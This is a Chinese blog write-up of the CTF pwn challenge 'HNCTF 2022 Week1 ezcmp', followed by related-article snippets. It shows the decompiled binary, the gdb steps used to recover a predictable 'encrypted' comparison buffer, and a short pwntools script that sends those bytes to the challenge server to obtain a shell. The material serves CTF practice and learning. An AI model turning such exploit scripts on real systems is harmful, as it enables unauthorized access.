nssctf-[HNCTF 2022 Week1]ezcmp

最新推荐文章于 2024-09-23 20:05:28 发布
最新推荐文章于 2024-09-23 20:05:28 发布
阅读量238 收藏
点赞数 2
分类专栏: pwn百题计划 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73818758/article/details/140264415
版权

这题比较简单了,主要就是考察你会不会用gdb

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-50h] BYREF
  char src[44]; // [rsp+20h] [rbp-30h] BYREF
  unsigned int seed; // [rsp+4Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(stdout, 0LL);
  puts("GDB-pwndbg maybe useful");
  strcpy(src, "Ayaka_nbbbbbbbbbbbbbbbbb_pluss");
  strcpy(buff, src);
  seed = 1;
  srand(1u);
  enccrypt(buff);
  read(0, buf, 0x1EuLL);
  if ( strncmp(buff, buf, 0x1EuLL) )
  {
    puts("Oh No!You lose!!!");
    exit(0);
  }
  return system("/bin/sh");
}

根据反编译后的代码可知只要满足buff=buf就可以getshell

首先我想到的是buff加密前的值是“Ayaka_nbbbbbbbbbbbbbbbbb_pluss”,直接根据加密函数加密后得到密文就行了,仔细观察可以看到加密过程中使用了随机数种子,伪加密,随机数种子给了,那就可以直接得到密文:

b'r@\x0e\xdc\xaaxF\x14\xe2\xb0~L\x1a\xe8\xb6\x84R\xee\xbc\x8aX&\xf4\xc2\x90^,\xcb\xc8\x00\x00'

但是无法直接输入,所以还是要借用pwntools

这里我们也可以用另一种方法,既然要比较buff和buf的内容,那我们可以直接根据buff的地址获取到加密后密文的存储地址

根据IDA可得buff的地址为0x404100

打开gdb进行调试:

 

在puts和read处设置断点

得到密文的存储地址

 编写exp如下:

from pwn import *
p = remote("node5.anna.nssctf.cn",28395)
payload = p64(0x144678aadc0e4072) + p64(0x84b6e81a4c7eb0e2) + p64(0xf426588abcee2052) + p64(0x0000c8cb2c5e90c2)
p.sendlineafter("GDB-pwndbg maybe useful",payload)
print(payload)
p.interactive()

gdb调试命令还是不熟(哭)

Wz0beu-淤青
关注
专栏目录
[HNCTF 2022 WEEK2]easy_unser - 反序列化(wakeup绕过&目录绕过)
oZuoShen123的博客
10-07 977
2、起始:body(__construct)、终点:body(__destruct),中间需要绕过__wakeup()1、题目干扰字符太多了,其实简化之后的代码差不多这样。
HNCTF week1
qq_49341576的博客
04-24 371
代码分析。
HNCTF 2022 Week1 easync
2301_79793667的博客
12-11 148
第一次查找,发现了个flag,但貌似是个假的flag,如输入进去还真是假的。里边有好多文件,我们只能耐心寻找,先是找到了flag的前一半。首先打开环境,发现并没有附件,那我们先进行nc连接。那我们只能再次寻找,看看真的flag到底藏在哪。将两部分拼接到一起,就是我们要找的flag。然后又找到了flag的后一半。
HNCTF 2022 week1 题解
m0_74057302的博客
04-25 443
自由才是生活主旋律。
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 1668
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
NSSCTF 刷题记录
红叶的博客
03-07 1144
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
NSSCTF靶场练习---HNCTF2022Week3&4部分wp
Sciurdae的博客
12-05 1407
函数来获取DLL中某个导出函数的地址,在这里就是,加载Dll1.dll,来获取其中名为ttt的函数地址,之后将其保存在ProcAddress变量中。不过这题不用怎么过,直接动态调试就好,断点下载11行main函数处,之后看汇编,在第一处exit处要跳过。加载了一个名为Dll1.dll的动态链接库,这个函数会返回一个模块的句柄hModule。IDA64打开,发现就是一个TEA加密,然后用dododo函数对v6(key)做了加密。之后就一直F8,直到程序打印出新的key就好了。先查壳,无壳,64bit。
CS-Build-Week-1
02-15
CS-Build-Week-1
week2day2
02-18
1. HTML基本结构:HTML文档通常以`<!DOCTYPE html>`开头,声明文档类型。接着是`<html>`元素,它是整个文档的根元素。`<head>`包含元信息,如标题、字符集等,而`<body>`则包含网页的实际内容。 2. 标签和属性:...
nssctf部分题解+xtea加密算法初步分析
2302_81097378的博客
05-05 697
首先我们通过以下形式进行下载并打开找到以下界面因为我们看到进行比较的字符串是一串乱码,因此我们可以判断进行了一定的加密算法(比如说base64加密tea加密算法等等等等)因为我们找到如下的函数界面我们就能看到这个进行加密的表格(经过魔改的表格)我们将其放置到赛博厨子上进行解密结果如下:得到flag:hgame{s0meth1ng_run_befOre_m@in}按照要求更改形式即可打开看见如下形式的代码块让我们逐行代码进行分析我们通过查找可以知道这个算法是XTEA加密算法。
PWN刷题解析
m0_73373164的博客
03-09 547
这个题涉及的知识点有点多毕竟保护全开,打开ida查看到sub函数里面的有个字符串溢出可以得到canary和基地址,用gdb因为开启了ple不能在main函数上下断点就只有下在printf上了然后调试你可以用stack查看到rbp上面的地址是****00可以猜到这个就是canary了因为canary一般情况下都是以00结尾的,canary保护主要是通过在栈下设置一个地址,返回是也必须带上那个地址不然就会触发保护,然后ple保护的话主要是通过每次修改.text、.data的地址。
[HNCTF 2022 Week1]easyoverflow
沈理大学牲的博客
11-17 236
v4的长度为44字节,只需要将他溢出,并将v5覆盖成一就可以了。v4和v5距离rbp的距离可以算出它们之间的相对偏移。
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 863
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
【中关村在线-注册/登录安全分析报告】
最新发布
09-23 870
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
如何检测出来这个ip是共享ip不安全
KookeeyLena8的博客
09-23 462
检测一个IP是否为共享IP以及其安全性可以通过以下几种方法和工具来进行分析。共享IP通常是指多个用户共享一个IP地址,常见于公共代理服务器、VPN服务或数据中心IP。如果你想评估一个IP是否为共享IP以及其安全性,以下方法和工具可以帮助你进行检测和分析。
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
数据恢复研究℃
09-20 1113
通过综合采取以上预防措施,可以显著降低感染 .[RestoreBackup@cock.li].SRC 、[chewbacca@cock.li].SRC勒索病毒的风险。保持警惕、定期备份数据以及更新安全防护措施是确保数据安全的重要策略。预防永远胜于治疗,积极的安全态度是抵御网络攻击的最佳保障。以下是2024常见传播的勒索病毒,表明勒索病毒正在呈现多样化以及变种迅速地态势发展。
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值